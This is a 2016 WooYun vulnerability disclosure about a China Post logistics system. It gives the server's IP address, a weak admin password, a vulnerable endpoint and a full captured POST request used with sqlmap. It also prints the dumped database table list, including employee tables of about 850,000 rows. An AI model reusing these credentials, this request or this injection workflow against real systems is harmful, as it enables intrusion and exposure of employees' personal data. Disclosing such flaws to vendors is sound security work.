当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187847

漏洞标题:中国邮政某系统弱口令及SQL注入涉及80多万员工信息

相关厂商:中国邮政集团公司信息技术局

漏洞作者: wps2015

提交时间:2016-03-23 07:47

修复时间:2016-05-07 08:19

公开时间:2016-05-07 08:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-23: 细节已通知厂商并且等待厂商处理中
2016-03-23: 厂商已经确认,细节仅向厂商公开
2016-04-02: 细节向核心白帽子及相关领域专家公开
2016-04-12: 细节向普通白帽子公开
2016-04-22: 细节向实习白帽子公开
2016-05-07: 细节向公众公开

简要描述:

弱口令进系统+SQL注入

详细说明:

问题站点:http://211.156.198.57
弱口令:ADMIN 888888

1.png


在揽收管理---揽收资源--车辆维护处,车牌号和车型字段存在sql注入

2.png


POST /clgl/clxxbAction_querypage.action HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=utf-8
X-Requested-With: XMLHttpRequest
_eosAjax: xml
encoding: utf-8
Referer: http://211.156.198.57/jsp/yzznzd/clgl/clgl_cx.jsp
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: 211.156.198.57
Content-Length: 516
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=xsSdwaOjxEzsIBECirXu1KTyGjTF1ujWibO8ulKxCnlLQyrySC5e!1358030613
submitType=2&ajax=<?xml version="1.0" encoding="utf-8"?><root><params><param><key>orgcode</key><value></value></param><param><key>orgcodeOthers</key><value></value></param><param><key>vXjjgbz</key><value>0</value></param><param><key>vCph</key><value>2*</value></param><param><key>vClzt</key><value></value></param><param><key>vCx</key><value>3</value></param></params>
<data><criteria><_entity></_entity></criteria><page><begin>0</begin><length>10</length><count>-1</count><isCount>true</isCount></page></data></root>


查询抓包到sqlmap中,24库

3.png


当前库

Database: YZZNZD
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| ZNZD_T_DEV               | 22836726 |
| ZNZD_T_PDADLB            | 16248560 |
| ZHW_T_LOG                | 15144408 |
| ZNZD_T_LTYGPSB           | 2771925 |
| TX_T_CSXXB               | 1656479 |
| AC_OPERATORROLE_BACK     | 1453543 |
| YZTD_T_YJXXB             | 1337742 |
| AC_OPERATORROLE          | 1081814 |
| ZJ_T_ZFCS                | 1073134 |
| OM_EMPORG                | 929456  |
| ZNZD_T_ZDBBXXB           | 921485  |
| ZJ_T_DZYHXX              | 896119  |
| OM_EMPLOYEE              | 852420  |
| AC_OPERATOR              | 851572  |
| ZJ_T_DZYHZDJG            | 725500  |
| ZJ_T_DZYHZDJG_BAK        | 705840  |
| TX_T_CSWJDJB             | 617281  |
| ZNZD_T_ERRLOG            | 530825  |
| ZNZD_T_GXTYSJGB          | 379680  |
| ZNZD_T_CONFIG            | 215879  |
| ZNZD_T_SBXXB             | 209276  |
| T_SYS_LOGINLOG           | 181842  |
| ZNZD_T_PDAXTB            | 152364  |
| YZTD_T_ZQWDJGB           | 143809  |
| YZTD_T_ZQWDJGB_0812      | 136225  |
| ZHW_T_JGLSGXB            | 135240  |
| TX_T_JSWJXXB             | 129743  |
| OM_ORGANIZATION_20141014 | 124473  |
| OM_ORGANIZATION          | 102608  |
| YZTD_T_ZQWDJGB_TMP       | 98695   |
| OM_ORGANIZATION_BACK     | 93550   |
| ZJ_T_ZFZTCS              | 83168   |
| TNP_T_YYJGB              | 61068   |
| YZTD_T_ZQWDJGB_1216      | 54853   |
| ABF_T_YGFJXXB            | 37931   |
| TNP_T_TDJGB              | 31757   |
| YZTD_T_JGQHYB            | 26843   |
| ZNZD_T_SBXXB_BAK         | 18574   |
| YZTD_T_TDJGXZQHDZB       | 17579   |
| ZHW_T_YGB_HBBAK          | 14799   |
| OM_EMPGROUP              | 12308   |
| ZNZD_T_YGUPDATE          | 7553    |
| ABF_T_ZZJGGXSB           | 4508    |
| ABF_T_JGFJXXB            | 4175    |
| ZNZD_T_GGFBJGDYB         | 4108    |
| SYS_EXPORT_SCHEMA_04     | 3526    |
| SYS_EXPORT_SCHEMA_03     | 3514    |
| ZNZD_T_GGHFRYDYB         | 3479    |
| SYS_EXPORT_SCHEMA_02     | 3400    |
| SYS_EXPORT_SCHEMA_01     | 3394    |
| TAB_BOROUGH              | 3177    |
| TAB_ORGAN                | 2774    |
| ZJ_T_QHYB                | 2621    |
| ZJ_T_GNDM                | 2480    |
| ZNZD_T_GGFBJSDYB         | 1972    |
| ZHW_T_JGB_HBBAK          | 1604    |
| ZNZD_T_TDJGB             | 1604    |
| YZTD_T_PBB               | 1334    |
| OM_PARTYROLE             | 1186    |
| ZNZD_T_LOG               | 1011    |
| TAB_CHYZBM               | 949     |
| OM_GROUPRANGE            | 898     |
| OM_GROUP                 | 796     |
| ABF_T_RYKGLJG            | 774     |
| ZNZD_T_GGXXB             | 759     |
| AC_ROLEFUNC              | 659     |
| ZJ_T_ZFZTCS_BAK          | 590     |
| ZHW_T_YGB                | 563     |
| ZNZD_T_JKPZB             | 534     |
| OM_EMPPOSITION           | 526     |
| AC_OPERATOR_JT           | 507     |
| AC_OPERATORROLE_JT       | 507     |
| OM_EMPLOYEE_JT           | 507     |
| OM_EMPORG_JT             | 507     |
| ZNZD_T_GXTYSJGB_JT       | 507     |
| YZTD_T_ZQWDJGB_WUHAN     | 449     |
| ZJ_T_YWCP                | 364     |
| EOS_DICT_ENTRY           | 345     |
| TAB_CITY                 | 343     |
| TAB_T_JKPZB              | 323     |
| YZTD_T_PBJHB             | 254     |
| ABF_T_DBSYB              | 198     |
| ZNZD_T_ZQJGYHYSB         | 174     |
| ZNZD_T_BBJGDYB           | 157     |
| EOS_UNIQUE_TABLE         | 142     |
| ZNZD_T_PLQYRYB           | 127     |
| ABF_T_EDUCATION          | 122     |
| EOS_DICT_TYPE            | 112     |
| ZNZD_T_PLQYGPSB          | 107     |
| ZNZD_T_DDJBXXB           | 96      |
| AC_FUNCGROUP             | 95      |
| AC_FUNCTION              | 93      |
| ABF_T_RYKGLJG_BAK        | 84      |
| ZNZD_T_LSRWCBB           | 81      |
| ZNZD_T_ZDBBSJB           | 78      |
| PDA_T_JSQXB              | 72      |
| ZNZD_T_KHXLZXB           | 71      |
| EOS_DICT_ENTRY_I18N      | 68      |
| PDA_T_FUNC               | 67      |
| ZNZD_T_CLXXB             | 59      |
| ZHW_T_JGB                | 51      |
| ZHW_T_JGB_JT             | 51      |
| ZNZD_T_DLXXB             | 42      |
| ZNZD_T_DEFCONF_DEF       | 41      |
| ZNZD_T_PLQYB             | 38      |
| ZNZD_T_KHTSXXB           | 33      |
| ZNZD_T_PLXLB             | 32      |
| TAB_PROVINCE             | 31      |
| ZNZD_T_SJYJYHB           | 30      |
| AC_APPLICATION           | 29      |
| ZNZD_T_PLXLAPB           | 28      |
| ZNZD_T_KHXX              | 21      |
| ZNZD_T_YWCPB             | 19      |
| TX_T_CSPZB               | 18      |
| ZNZD_T_PLYWHZB           | 17      |
| EOS_DICT_TYPE_I18N       | 16      |
| ZHXX_T_TSXXB             | 16      |
| ZNZD_T_KHXXB             | 15      |
| ZNZD_T_PBJHXX            | 13      |
| ZNZD_T_PLPBXXB           | 13      |
| ZNZD_T_WXYHXXB           | 13      |
| TAB_USERMAP              | 12      |
| ZNZD_T_CSXXB             | 12      |
| ZNZD_T_SYSPAGE           | 12      |
| PDA_T_UJS                | 11      |
| AC_ROLE                  | 10      |
| PDA_T_UMAP               | 10      |
| OM_EMPLOYEE_SJLS         | 9       |
| PDA_T_ROLE               | 8       |
| PDA_T_USER               | 8       |
| O_ORG                    | 7       |
| ABF_T_GGB                | 6       |
| TAB_INTERFACE            | 6       |
| TAB_USER                 | 6       |
| EOS_QRTZ_LOCKS           | 5       |
| TAB_T_DICTION            | 4       |
| ABF_T_ZZJGSB             | 3       |
| OM_POSITION              | 3       |
| ZHXX_T_VERSION           | 3       |
| ZNZD_T_DEFCONF           | 2       |
| ABF_T_JGFJZDXXDMB        | 1       |
| EOS_QRTZ_FIRED_TRIGGERS  | 1       |
| EOS_QRTZ_SIMPLE_TRIGGERS | 1       |
| TAB_TERMINAL             | 1       |
| TDGJ_T_VERSION           | 1       |
| ZNZD_T_DBSYB             | 1       |
| ZNZD_T_DBYSB             | 1       |
+--------------------------+---------+


OM_EMPLOYEE 852420

4.png


AC_OPERATOR 851572

5.png


漏洞证明:

5.png

修复方案:

过滤

版权声明:转载请注明来源 wps2015@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-23 08:19

厂商回复:

谢谢。

最新状态:

暂无